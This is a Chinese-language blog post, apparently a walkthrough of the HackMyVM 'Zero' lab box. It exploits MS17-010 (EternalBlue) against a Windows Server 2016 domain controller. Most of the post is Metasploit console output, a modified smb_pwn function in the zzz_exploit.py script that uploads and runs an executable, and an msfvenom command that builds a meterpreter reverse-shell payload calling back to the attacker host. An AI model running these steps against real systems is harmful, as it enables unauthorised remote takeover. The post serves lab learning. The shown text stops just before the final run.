{"id":779,"date":"2024-08-10T20:26:03","date_gmt":"2024-08-10T12:26:03","guid":{"rendered":"http:\/\/162.14.82.114\/?p=779"},"modified":"2024-08-10T20:26:03","modified_gmt":"2024-08-10T12:26:03","slug":"hmv-_-zero","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/779\/08\/10\/2024\/","title":{"rendered":"hmv[-_-]Zero"},"content":{"rendered":"

Zero<\/h1>\n
\n

\u9700\u8981\u6539\u811a\u672c\u6267\u884c\u914d\u7f6e\u7684\u6c38\u6052\u4e4b\u84dd\u6f0f\u6d1e\u9776\u573a\u3002\u3002\u3002\u3002<\/p>\n<\/blockquote>\n

\"image-20240528145830774\"<\/div>
\n
\"image-20240810144730462\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.100:53\nOpen 192.168.10.100:88\nOpen 192.168.10.100:135\nOpen 192.168.10.100:139\nOpen 192.168.10.100:389\nOpen 192.168.10.100:445\nOpen 192.168.10.100:464\nOpen 192.168.10.100:593\nOpen 192.168.10.100:636\nOpen 192.168.10.100:3268\nOpen 192.168.10.100:5985\nOpen 192.168.10.100:9389\nOpen 192.168.10.100:49667\nOpen 192.168.10.100:49668\nOpen 192.168.10.100:49669\nOpen 192.168.10.100:49670\nOpen 192.168.10.100:49685\nOpen 192.168.10.100:49710<\/code><\/pre>\n
\u6f0f\u6d1e\u5229\u7528<\/h2>\n
msf\u811a\u672c\u5229\u7528<\/h3>\n
\u65e0web\u6e17\u900f\uff0c\u4f46\u662f\u5f00\u653e\u4e86445<\/code>\u7aef\u53e3\u670d\u52a1\uff0c\u5c1d\u8bd5\u63a2\u7d22\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero]\n\u2514\u2500$ msfconsole -q\nmsf6 > search ms17-010\n\nMatching Modules\n================\n\n   #   Name                                           Disclosure Date  Rank     Check  Description\n   -   ----                                           ---------------  ----     -----  -----------\n   0   exploit\/windows\/smb\/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\n   1     \\_ target: Automatic Target                  .                .        .      .\n   2     \\_ target: Windows 7                         .                .        .      .\n   3     \\_ target: Windows Embedded Standard 7       .                .        .      .\n   4     \\_ target: Windows Server 2008 R2            .                .        .      .\n   5     \\_ target: Windows 8                         .                .        .      .\n   6     \\_ target: Windows 8.1                       .                .        .      .\n   7     \\_ target: Windows Server 2012               .                .        .      .\n   8     \\_ target: Windows 10 Pro                    .                .        .      .\n   9     \\_ target: Windows 10 Enterprise Evaluation  .                .        .      .\n   10  exploit\/windows\/smb\/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance\/EternalSynergy\/EternalChampion SMB Remote Windows Code Execution\n   11    \\_ target: Automatic                         .                .        .      .\n   12    \\_ target: PowerShell                        .                .        .      .\n   13    \\_ target: Native upload                     .                .        .      .\n   14    \\_ target: MOF upload                        .                .        .      .\n   15    \\_ AKA: ETERNALSYNERGY                       .                .        .      .\n   16    \\_ AKA: ETERNALROMANCE                       .                .        .      .\n   17    \\_ AKA: ETERNALCHAMPION                      .                .        .      .\n   18    \\_ AKA: ETERNALBLUE                          .                .        .      .\n   19  auxiliary\/admin\/smb\/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance\/EternalSynergy\/EternalChampion SMB Remote Windows Command Execution\n   20    \\_ AKA: ETERNALSYNERGY                       .                .        .      .\n   21    \\_ AKA: ETERNALROMANCE                       .                .        .      .\n   22    \\_ AKA: ETERNALCHAMPION                      .                .        .      .\n   23    \\_ AKA: ETERNALBLUE                          .                .        .      .\n   24  auxiliary\/scanner\/smb\/smb_ms17_010             .                normal   No     MS17-010 SMB RCE Detection\n   25    \\_ AKA: DOUBLEPULSAR                         .                .        .      .\n   26    \\_ AKA: ETERNALBLUE                          .                .        .      .\n   27  exploit\/windows\/smb\/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution\n   28    \\_ target: Execute payload (x64)             .                .        .      .\n   29    \\_ target: Neutralize implant                .                .        .      .\n\nInteract with a module by name or index. For example info 29, use 29 or use exploit\/windows\/smb\/smb_doublepulsar_rce\nAfter interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'\n\nmsf6 > use auxiliary\/scanner\/smb\/smb_ms17_010\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) > show options\n\nModule options (auxiliary\/scanner\/smb\/smb_ms17_010):\n\n   Name         Current Setting                                            Required  Description\n   ----         ---------------                                            --------  -----------\n   CHECK_ARCH   true                                                       no        Check for architecture on vulnerable hosts\n   CHECK_DOPU   true                                                       no        Check for DOUBLEPULSAR on vulnerable hosts\n   CHECK_PIPE   false                                                      no        Check for named pipe on vulnerable hosts\n   NAMED_PIPES  \/usr\/share\/metasploit-framework\/data\/wordlists\/named_pipe  yes       List of named pipes to check\n                s.txt\n   RHOSTS                                                                  yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT        445                                                        yes       The SMB service port (TCP)\n   SMBDomain    .                                                          no        The Windows domain to use for authentication\n   SMBPass                                                                 no        The password for the specified username\n   SMBUser                                                                 no        The username to authenticate as\n   THREADS      1                                                          yes       The number of concurrent threads (max one per host)\n\nView the full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) > set rhosts 192.168.10.100\nrhosts => 192.168.10.100\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) > run\n\n[+] 192.168.10.100:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit)\n[*] 192.168.10.100:445    - Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) > use exploit\/windows\/smb\/ms17_010_eternalblue\n[*] No payload configured, defaulting to windows\/x64\/meterpreter\/reverse_tcp\nmsf6 exploit(windows\/smb\/ms17_010_eternalblue) > show options\n\nModule options (exploit\/windows\/smb\/ms17_010_eternalblue):\n\n   Name           Current Setting  Required  Description\n   ----           ---------------  --------  -----------\n   RHOSTS                          yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT          445              yes       The target port (TCP)\n   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target ma\n                                             chines.\n   SMBPass                         no        (Optional) The password for the specified username\n   SMBUser                         no        (Optional) The username to authenticate as\n   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machin\n                                             es.\n   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.\n\nPayload options (windows\/x64\/meterpreter\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)\n   LHOST     10.0.2.4         yes       The listen address (an interface may be specified)\n   LPORT     4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Automatic Target\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(windows\/smb\/ms17_010_eternalblue) > set rhosts 192.168.10.100\nrhosts => 192.168.10.100\nmsf6 exploit(windows\/smb\/ms17_010_eternalblue) > set lhost 192.168.10.104\nlhost => 192.168.10.104\nmsf6 exploit(windows\/smb\/ms17_010_eternalblue) > run\n\n[*] Started reverse TCP handler on 192.168.10.104:4444 \n[*] 192.168.10.100:445 - Using auxiliary\/scanner\/smb\/smb_ms17_010 as check\n[+] 192.168.10.100:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit)\n[*] 192.168.10.100:445    - Scanned 1 of 1 hosts (100% complete)\n[+] 192.168.10.100:445 - The target is vulnerable.\n[*] 192.168.10.100:445 - Connecting to target for exploitation.\n[+] 192.168.10.100:445 - Connection established for exploitation.\n[+] 192.168.10.100:445 - Target OS selected valid for OS indicated by SMB reply\n[*] 192.168.10.100:445 - CORE raw buffer dump (45 bytes)\n[*] 192.168.10.100:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2\n[*] 192.168.10.100:445 - 0x00000010  30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61  016 Standard Eva\n[*] 192.168.10.100:445 - 0x00000020  6c 75 61 74 69 6f 6e 20 31 34 33 39 33           luation 14393   \n[+] 192.168.10.100:445 - Target arch selected valid for arch indicated by DCE\/RPC reply\n[*] 192.168.10.100:445 - Trying exploit with 12 Groom Allocations.\n[*] 192.168.10.100:445 - Sending all but last fragment of exploit packet\n[*] 192.168.10.100:445 - Starting non-paged pool grooming\n[+] 192.168.10.100:445 - Sending SMBv2 buffers\n[+] 192.168.10.100:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\n[*] 192.168.10.100:445 - Sending final SMBv2 buffers.\n[*] 192.168.10.100:445 - Sending last fragment of exploit packet!\n[*] 192.168.10.100:445 - Receiving response from exploit packet\n[+] 192.168.10.100:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!\n[*] 192.168.10.100:445 - Sending egg to corrupted connection.\n[*] 192.168.10.100:445 - Triggering free of corrupted buffer.\n[-] 192.168.10.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n[-] 192.168.10.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n[-] 192.168.10.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n[*] 192.168.10.100:445 - Connecting to target for exploitation.\n[+] 192.168.10.100:445 - Connection established for exploitation.\n[+] 192.168.10.100:445 - Target OS selected valid for OS indicated by SMB reply\n[*] 192.168.10.100:445 - CORE raw buffer dump (45 bytes)\n[*] 192.168.10.100:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2\n[*] 192.168.10.100:445 - 0x00000010  30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61  016 Standard Eva\n[*] 192.168.10.100:445 - 0x00000020  6c 75 61 74 69 6f 6e 20 31 34 33 39 33           luation 14393   \n[+] 192.168.10.100:445 - Target arch selected valid for arch indicated by DCE\/RPC reply\n[*] 192.168.10.100:445 - Trying exploit with 17 Groom Allocations.\n[*] 192.168.10.100:445 - Sending all but last fragment of exploit packet\n^C[-] 192.168.10.100:445 - Exploit failed [user-interrupt]: Interrupt \n[-] run: Interrupted\nmsf6 exploit(windows\/smb\/ms17_010_eternalblue) > use exploit\/windows\/smb\/ms17_010_psexec\n[*] No payload configured, defaulting to windows\/meterpreter\/reverse_tcp\nmsf6 exploit(windows\/smb\/ms17_010_psexec) > show options\n\nModule options (exploit\/windows\/smb\/ms17_010_psexec):\n\n   Name                  Current Setting                                       Required  Description\n   ----                  ---------------                                       --------  -----------\n   DBGTRACE              false                                                 yes       Show extra debug trace info\n   LEAKATTEMPTS          99                                                    yes       How many times to try to leak transaction\n   NAMEDPIPE                                                                   no        A named pipe that can be connected to (leave blank for auto)\n   NAMED_PIPES           \/usr\/share\/metasploit-framework\/data\/wordlists\/named  yes       List of named pipes to check\n                         _pipes.txt\n   RHOSTS                                                                      yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.\n                                                                                         html\n   RPORT                 445                                                   yes       The Target port (TCP)\n   SERVICE_DESCRIPTION                                                         no        Service description to be used on target for pretty listing\n   SERVICE_DISPLAY_NAME                                                        no        The service display name\n   SERVICE_NAME                                                                no        The service name\n   SHARE                 ADMIN$                                                yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read\/write folder share\n   SMBDomain             .                                                     no        The Windows domain to use for authentication\n   SMBPass                                                                     no        The password for the specified username\n   SMBUser                                                                     no        The username to authenticate as\n\nPayload options (windows\/meterpreter\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)\n   LHOST     10.0.2.4         yes       The listen address (an interface may be specified)\n   LPORT     4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Automatic\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(windows\/smb\/ms17_010_psexec) > set rhosts 192.168.10.100\nrhosts => 192.168.10.100\nmsf6 exploit(windows\/smb\/ms17_010_psexec) > set lhost 192.168.10.104\nlhost => 192.168.10.104\nmsf6 exploit(windows\/smb\/ms17_010_psexec) > run\n\n[*] Started reverse TCP handler on 192.168.10.104:4444 \n[*] 192.168.10.100:445 - Target OS: Windows Server 2016 Standard Evaluation 14393\n[*] 192.168.10.100:445 - Built a write-what-where primitive...\n[+] 192.168.10.100:445 - Overwrite complete... SYSTEM session obtained!\n[*] 192.168.10.100:445 - Selecting PowerShell target\n[*] 192.168.10.100:445 - Executing the payload...\n[+] 192.168.10.100:445 - Service start timed out, OK if running a command or non-service executable...\n[*] Exploit completed, but no session was created.<\/code><\/pre>\n
\u91cd\u65b0\u626b\u63cf\u4e00\u4e0b\u76f8\u5173\u914d\u7f6e\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/AutoBlue-MS17-010]\n\u2514\u2500$ nmap -Pn $IP 445 -sC -sV -sT -T4 \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-10 04:17 EDT\nNmap scan report for 192.168.10.100\nHost is up (0.0034s latency).\nNot shown: 989 filtered tcp ports (no-response)\nPORT     STATE SERVICE      VERSION\n53\/tcp   open  domain       Simple DNS Plus\n88\/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-10 23:18:01Z)\n135\/tcp  open  msrpc        Microsoft Windows RPC\n139\/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn\n389\/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: zero.hmv, Site: Default-First-Site-Name)\n445\/tcp  open  microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: ZERO)\n464\/tcp  open  kpasswd5?\n593\/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0\n636\/tcp  open  tcpwrapped\n3268\/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: zero.hmv, Site: Default-First-Site-Name)\n3269\/tcp open  tcpwrapped\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled and required\n| smb-os-discovery: \n|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)\n|   Computer name: DC01\n|   NetBIOS computer name: DC01\\x00\n|   Domain name: zero.hmv\n|   Forest name: zero.hmv\n|   FQDN: DC01.zero.hmv\n|_  System time: 2024-08-10T16:18:02-07:00\n|_clock-skew: mean: 17h20m01s, deviation: 4h02m29s, median: 15h00m00s\n| smb2-time: \n|   date: 2024-08-10T23:18:02\n|_  start_date: 2024-08-10T21:41:37\n| smb-security-mode: \n|   account_used: <blank>\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: required\n|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:15:ea:1c (Oracle VirtualBox virtual NIC)\n\nNmap scan report for 445 (0.0.1.189)\nHost is up.\nAll 1000 scanned ports on 445 (0.0.1.189) are in ignored states.\nNot shown: 1000 filtered tcp ports (no-response)\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 2 IP addresses (2 hosts up) scanned in 67.52 seconds<\/code><\/pre>\n
\u53d1\u73b0\u5b58\u5728\u4e00\u4e2a\u57df\u540d\u89e3\u6790\uff0c\u4fee\u6539\u76f8\u5173\u914d\u7f6e\uff0c\u91cd\u65b0\u8fdb\u884c\u5229\u7528\uff0c\u8fd8\u662f\u4e0d\u884c\u3002\u3002\u3002\u5c1d\u8bd5\u7f51\u4e0a\u7684\u5176\u4ed6\u811a\u672c\uff1a<\/p>\n
\"image-20240810172537213\"<\/div><\/p>\n
https:\/\/github.com\/3ndG4me\/AutoBlue-MS17-010<\/a><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/AutoBlue-MS17-010]\n\u2514\u2500$ ls -la\ntotal 200\ndrwxr-xr-x 4 kali kali  4096 Aug 10 04:16 .\ndrwxr-xr-x 3 kali kali  4096 Aug 10 04:07 ..\n-rwxr-xr-x 1 kali kali 26444 Aug 10 04:07 eternalblue_exploit10.py\n-rwxr-xr-x 1 kali kali 25741 Aug 10 04:07 eternalblue_exploit7.py\n-rwxr-xr-x 1 kali kali 24106 Aug 10 04:07 eternalblue_exploit8.py\n-rwxr-xr-x 1 kali kali  2801 Aug 10 04:07 eternal_checker.py\n-rwxr-xr-x 1 kali kali  1070 Aug 10 04:07 LICENSE\n-rwxr-xr-x 1 kali kali  3640 Aug 10 04:07 listener_prep.sh\n-rwxr-xr-x 1 kali kali 25943 Aug 10 04:07 mysmb.py\ndrwxr-xr-x 2 kali kali  4096 Aug 10 04:07 __pycache__\n-rwxr-xr-x 1 kali kali  5352 Aug 10 04:07 README.md\n-rwxr-xr-x 1 kali kali     8 Aug 10 04:07 requirements.txt\ndrwxr-xr-x 2 kali kali  4096 Aug 10 04:13 shellcode\n-rwxr-xr-x 1 kali kali 49249 Aug 10 04:07 zzz_exploit.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/AutoBlue-MS17-010]\n\u2514\u2500$ python3 eternal_checker.py 192.168.10.100\n[*] Target OS: Windows Server 2016 Standard Evaluation 14393\n[!] The target is not patched\n=== Testing named pipes ===\n[+] Found pipe 'netlogon'\n[+] Found pipe 'lsarpc'\n[+] Found pipe 'samr'\n[*] Done<\/code><\/pre>\n
\u7136\u540e\u6309\u7167README.md<\/code>\u5c1d\u8bd5\u4e86\u63a5\u4e0b\u6765\u7684\u64cd\u4f5c\uff0c\u4f46\u662f\u6ca1\u6709\u5f39\u56de\u6765\uff0c\u4e0d\u77e5\u9053\u662f\u4e0d\u662f\u54ea\u91cc\u641e\u9519\u4e86\u3002<\/p>\n
\u811a\u672c\u4fee\u6539\u5229\u7528<\/h3>\n
windows\u505a\u7684\u5c11\uff0c\u53ea\u80fd\u8ddf\u7740wp\u505a\u4e86\uff0c\u5c1d\u8bd5\u53bb\u8fd9\u4e2a\u5e93\u7684\u6e90\u4ed3\u5e93\u770b\u770b\uff1ahttps:\/\/github.com\/worawit\/MS17-010<\/a><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ python2 checker.py 192.168.10.100\nTraceback (most recent call last):\n  File "checker.py", line 1, in <module>\n    from mysmb import MYSMB\n  File "\/home\/kali\/temp\/zero\/MS17-010\/mysmb.py", line 3, in <module>\n    from impacket import smb, smbconnection\nImportError: No module named impacket\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ python2 -m pip install impacket==0.9.20\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ python2 checker.py 192.168.10.100      \nTarget OS: Windows Server 2016 Standard Evaluation 14393\nThe target is not patched\n\n=== Testing named pipes ===\nspoolss: STATUS_ACCESS_DENIED\nsamr: Ok (64 bit)\nnetlogon: Ok (64 bit)\nlsarpc: Ok (64 bit)\nbrowser: STATUS_ACCESS_DENIED<\/code><\/pre>\n
\u4fee\u6539\u6389\u76f8\u5173\u7279\u5f81\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
def smb_pwn(conn, arch):\n        smbConn = conn.get_smbconnection()\n\n        print('creating file c:\\\\pwned.txt on the target')\n        tid2 = smbConn.connectTree('C$')\n        fid2 = smbConn.createFile(tid2, '\/pwned.txt')\n        smbConn.closeFile(tid2, fid2)\n        smbConn.disconnectTree(tid2)\n\n        #smb_send_file(smbConn, sys.argv[0], 'C', '\/exploit.py')\n        #service_exec(conn, r'cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt')\n        # Note: there are many methods to get shell over SMB admin session\n        # a simple method to get shell (but easily to be detected by AV) is\n        # executing binary generated by "msfvenom -f exe-service ..."<\/code><\/pre>\n
\u4fee\u6539\u4e3a\uff1a<\/p>\n
def smb_pwn(conn, arch):\n        # smbConn = conn.get_smbconnection()\n\n        # print('creating file c:\\\\pwned.txt on the target')\n        # tid2 = smbConn.connectTree('C$')\n        # fid2 = smbConn.createFile(tid2, '\/pwned.txt')\n        # smbConn.closeFile(tid2, fid2)\n        # smbConn.disconnectTree(tid2)\n\n        # smb_send_file(smbConn, sys.argv[0], 'C', '\/exploit.py')\n        #service_exec(conn, r'cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt')\n        service_exec(conn, r'cmd \/c ping 192.168.10.104')\n        # Note: there are many methods to get shell over SMB admin session\n        # a simple method to get shell (but easily to be detected by AV) is\n        # executing binary generated by "msfvenom -f exe-service ..."<\/code><\/pre>\n
\u5c1d\u8bd5\u6267\u884c\uff0c\u770b\u4e00\u4e0b\u80fd\u5426\u63a5\u6536\u5230ping\uff1a<\/p>\n
# kali1\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ cp zzz_exploit.py zzz_exploit_change.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ vim zzz_exploit_change.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ chmod +x *\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ python2 zzz_exploit_change.py 192.168.10.100\nTarget OS: Windows Server 2016 Standard Evaluation 14393\nUsing named pipe: netlogon\nTarget is 64 bit\nGot frag size: 0x20\nGROOM_POOL_SIZE: 0x5030\nBRIDE_TRANS_SIZE: 0xf90\nCONNECTION: 0xffffc407182b8910\nSESSION: 0xffffb406737d6450\nFLINK: 0xffffb406750a2098\nInParam: 0xffffb4067509616c\nMID: 0x2903\nunexpected alignment, diff: 0xb098\nleak failed... try again\nCONNECTION: 0xffffc407182b8910\nSESSION: 0xffffb406737d6450\nFLINK: 0xffffb406750b1098\nInParam: 0xffffb406750ab16c\nMID: 0x2903\nsuccess controlling groom transaction\nmodify trans1 struct for arbitrary read\/write\nmake this SMB session to be SYSTEM\noverwriting session security context\nOpening SVCManager on 192.168.10.100.....\nCreating service gFLX.....\nStarting service gFLX.....\nSCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.\nRemoving service gFLX.....\nDone\n\n# kali2\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero]\n\u2514\u2500$ sudo tcpdump -i eth1 host 192.168.10.100\n[sudo] password for kali: \ntcpdump: verbose output suppressed, use -v[v]... for full protocol decode\nlistening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes\n06:17:05.809879 IP 192.168.10.100 > 224.0.0.252: igmp v2 report 224.0.0.252\n06:17:06.321587 IP 192.168.10.100 > 224.0.0.251: igmp v2 report 224.0.0.251\n06:17:15.222515 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [S], seq 2544194393, win 32120, options [mss 1460,sackOK,TS val 3299061392 ecr 0,nop,wscale 7], length 0\n06:17:15.223170 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [S.], seq 2916466824, ack 2544194394, win 8192, options [mss 1460,nop,wscale 8,sackOK,TS val 6384526 ecr 3299061392], length 0\n06:17:15.223189 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [.], ack 1, win 251, options [nop,nop,TS val 3299061393 ecr 6384526], length 0\n06:17:15.223537 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 1:52, ack 1, win 251, options [nop,nop,TS val 3299061393 ecr 6384526], length 51\n06:17:15.224395 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [P.], seq 1:210, ack 52, win 2081, options [nop,nop,TS val 6384527 ecr 3299061393], length 209\n06:17:15.224409 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [.], ack 210, win 250, options [nop,nop,TS val 3299061394 ecr 6384527], length 0\n06:17:15.225756 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 52:192, ack 210, win 250, options [nop,nop,TS val 3299061395 ecr 6384527], length 140\n06:17:15.226811 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [P.], seq 210:552, ack 192, win 2080, options [nop,nop,TS val 6384529 ecr 3299061395], length 342\n06:17:15.229722 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 192:355, ack 552, win 249, options [nop,nop,TS val 3299061399 ecr 6384529], length 163\n06:17:15.231001 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [P.], seq 552:698, ack 355, win 2080, options [nop,nop,TS val 6384533 ecr 3299061399], length 146\n06:17:15.232466 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 355:431, ack 698, win 249, options [nop,nop,TS val 3299061402 ecr 6384533], length 76\n06:17:15.233213 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [P.], seq 698:748, ack 431, win 2080, options [nop,nop,TS val 6384536 ecr 3299061402], length 50\n06:17:15.234234 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 431:526, ack 748, win 249, options [nop,nop,TS val 3299061404 ecr 6384536], length 95\n06:17:15.234880 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [P.], seq 748:787, ack 526, win 2079, options [nop,nop,TS val 6384537 ecr 3299061404], length 39\n06:17:15.236117 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 526:621, ack 787, win 249, options [nop,nop,TS val 3299061405 ecr 6384537], length 95\n................<\/code><\/pre>\n
\u8bf4\u660e\u53ef\u4ee5\u6b63\u5e38\u6267\u884c\u547d\u4ee4\uff0c\u5c1d\u8bd5\u4fee\u6539\u8fdb\u884c\u53cd\u5f39shell\u3002<\/p>\n
def smb_pwn(conn, arch):\n        smbConn = conn.get_smbconnection()\n\n        # print('creating file c:\\\\pwned.txt on the target')\n        # tid2 = smbConn.connectTree('C$')\n        # fid2 = smbConn.createFile(tid2, '\/pwned.txt')\n        # smbConn.closeFile(tid2, fid2)\n        # smbConn.disconnectTree(tid2)\n\n        smb_send_file(smbConn, 'shell.exe', 'C', '\/system.exe') \n        #service_exec(conn, r'cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt')\n        service_exec(conn, r'cmd \/c c:\\\\system.exe')\n        # Note: there are many methods to get shell over SMB admin session\n        # a simple method to get shell (but easily to be detected by AV) is\n        # executing binary generated by "msfvenom -f exe-service ..."<\/code><\/pre>\n
\u7136\u540e\u751f\u6210\u4e00\u4e2ashell.exe<\/code>\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=192.168.10.104  LPORT=1234 -f exe -o shell.exe\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 354 bytes\nFinal size of exe file: 73802 bytes\nSaved as: shell.exe<\/code><\/pre>\n
\u5c1d\u8bd5\u6267\u884c\uff1a<\/p>\n
